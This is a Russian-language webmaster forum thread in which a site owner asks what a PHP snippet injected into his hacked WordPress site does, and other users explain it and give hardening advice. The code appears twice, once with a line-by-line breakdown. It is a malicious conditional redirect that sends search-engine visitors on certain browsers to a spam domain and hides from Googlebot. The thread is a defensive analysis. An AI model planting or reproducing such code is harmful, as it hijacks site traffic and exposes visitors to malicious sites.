Подскажите что делает код

[Obormot]

Ломанули сайт на днях, вот такое появилось в файлах )
Подскажите что делает ?

<?� z��(m��_u�(u("error_reporting(0); if (!headers_sent()){ if (isset($_SERVER['HTTP_USER_AGENT'])){ if (isset($_SERVER['HTTP_REFERER'])){ if ((preg_match ("/MSIE (9.0|10.0)/",$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/rv:[0-9]+\.0\) like Gecko/",$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/Firefox\/([0-9]+\.0)/",$_SERVER['HTTP_USER_AGENT'],$matchf) and $matchf[1]>11)){ if(!preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])){ if (stristr($_SERVER['HTTP_REFERER'],"yahoo.") or stristr($_SERVER['HTTP_REFERER'],"bing.") or preg_match ("/google\.(.*?)\/url\?sa/",$_SERVER['HTTP_REFERER'])) { if (!stristr($_SERVER['HTTP_REFERER'],"cache") and !stristr($_SERVER['HTTP_REFERER'],"inurl") and !stristr($_SERVER['HTTP_REFERER'],"EeYp3D7")){ header("Location: http://fptjsjbjs.rebatesrule.net/"); exit(); } } } } } } }"));?>

Изначально было в base64, расшифровал при помощи скрипта из гугл.

 

[Nei]

Код при определенных условиях (юзерагент, реферер) редиректит на

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

 

[Obormot]

Сайт погуглил он везде в черных списках.
А вообще для чего это делается? Не в рекламных введь целях?

 

[Nei]

Нет, не в рекламных. С сайта при помощи этого кода крадут посетителей.

 

[Denixxx]

для чего это делается?

Я думаю это будущие хакеры тестировали свои скрипты, не покупая хостинга.
Взяли VDS "на пробу", попросили хостера прикрутить VDS к бесплатному доменному имени сервиса Для просмотра ссылки Войди или Зарегистрируйся
Запустили машинку и собрали статистику с уязвимых сайтов, пока их не отключили.
Так что, раз им всё удалось, скорее всего последует новая атака.
Уже будут редиректить на клиента, за деньги
Почему так думаю:
1. Бесплатный домен — если бы платили за него, потерять было бы жалко.
2. Домен 3 уровня из бессмысленного набора символов — для себя такой не возьмешь и даром.
3. Судя по остаткам в поисковиках, успели поработать с неделю всего — потом наверно забанили.
Если у будущих «ломателей» нет фантазии, то «ломать» снова будут тоже с бесплатного домена 3 уровня.
Так что можно попробовать внести в блек-лист домены с выпадающего списка регистрации на этой странице Для просмотра ссылки Войди или Зарегистрируйся
И обновить движок, конечно.
А сайт-то на каком движке, если не секрет?

 

[PapaJoe]

Спойлер

<?? z??(m??_u?(u("error_reporting(0);
if (!headers_sent()){
if (isset($_SERVER['HTTP_USER_AGENT'])){
if (isset($_SERVER['HTTP_REFERER'])){
if ((preg_match ("/MSIE (9.0|10.0)/",$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/rv:[0-9]+\.0\) like Gecko/",$_SERVER['HTTP_USER_AGENT']))
or (preg_match ("/Firefox\/([0-9]+\.0)/",$_SERVER['HTTP_USER_AGENT'],$matchf) and $matchf[1]>11)
){
if(!preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])){
if (stristr($_SERVER['HTTP_REFERER'],"yahoo.")
or stristr($_SERVER['HTTP_REFERER'],"bing.")
or preg_match ("/google\.(.*?)\/url\?sa/",$_SERVER['HTTP_REFERER'])) {
if (!stristr($_SERVER['HTTP_REFERER'],"cache")
and !stristr($_SERVER['HTTP_REFERER'],"inurl")
and !stristr($_SERVER['HTTP_REFERER'],"EeYp3D7")){
header("Location: http://fptjsjbjs.rebatesrule.net/"); exit();
}
}
}
}
}
}
}"));
?>

1. Если ещё не были отправлены заголовки !headers_sent()
2. Если есть юзер-агент isset($_SERVER['HTTP_USER_AGENT']))
3. Если это Экплорер 9 или 10 версии или Хром или файрфокс выше 11 версии
4. Если это не "определенные" лица обращаются к странице, !preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])
5. Если посетитель приперся с поисковиков юху, бинг или гугл
6. Если, переходя с поисковика, посетитель не искал слова "cache", "inurl", "EeYp3D7"

тогда редирект на Для просмотра ссылки Войди или Зарегистрируйся

 

[Obormot]

А сайт-то на каком движке, если не секрет?

Был старенький вопрс пресс версии осени 2013, не обновлялся, ибо шаблон новые версии не держал.
Сейчас все обновил, поменял везде пароли, свой комп посмотрел всякими removal-тулсами.

Посмотрим... очень обидно будет в бан ПС влететь из-за подобного кода (

Вообще с вордпрессами беда какая-то, у меня несколько сайтов на разных хостах, везде стоят инидкаторы неверных входов в панель - ежедневно блокируется порядка 1-4 попыток входа (более 5 раз неверный пароль).
До того как постваил эти скрипты была вообще жесть, смотрел логи за сутки прилетало штук по 500 запросов на авторизацию.. ЦП на хосте даже выходил на лимиты

 

[penguen]

Вообще с вордпрессами беда какая-то, у меня несколько сайтов на разных хостах, везде стоят инидкаторы неверных входов в панель - ежедневно блокируется порядка 1-4 попыток входа (более 5 раз неверный пароль).
До того как постваил эти скрипты была вообще жесть, смотрел логи за сутки прилетало штук по 500 запросов на авторизацию.. ЦП на хосте даже выходил на лимиты

Брутят, соотв. возрастает нагрузка на ЦП. поставте антиспам-бот+пароль на директорию+заход лишь с ваших айпишников и всё.

 

[vvs777]

Исходный скрипт - редирект юзера по браузерам и при условии что это не поисковый робот. Типичный код.
По бруту - если мощность большая и нагрузка существенная есть смысл ставить костыли, но проще перенести/переименовать админку. 99% брутеров юзают стандартные скрипты

 

[MacGyver]

Более дырявого движка, чем ворд пресс я не встречал. Как-то глянул в самую свежую сборку, а в ней 23 незакрытых уязвимости по данным milw0rm.com ...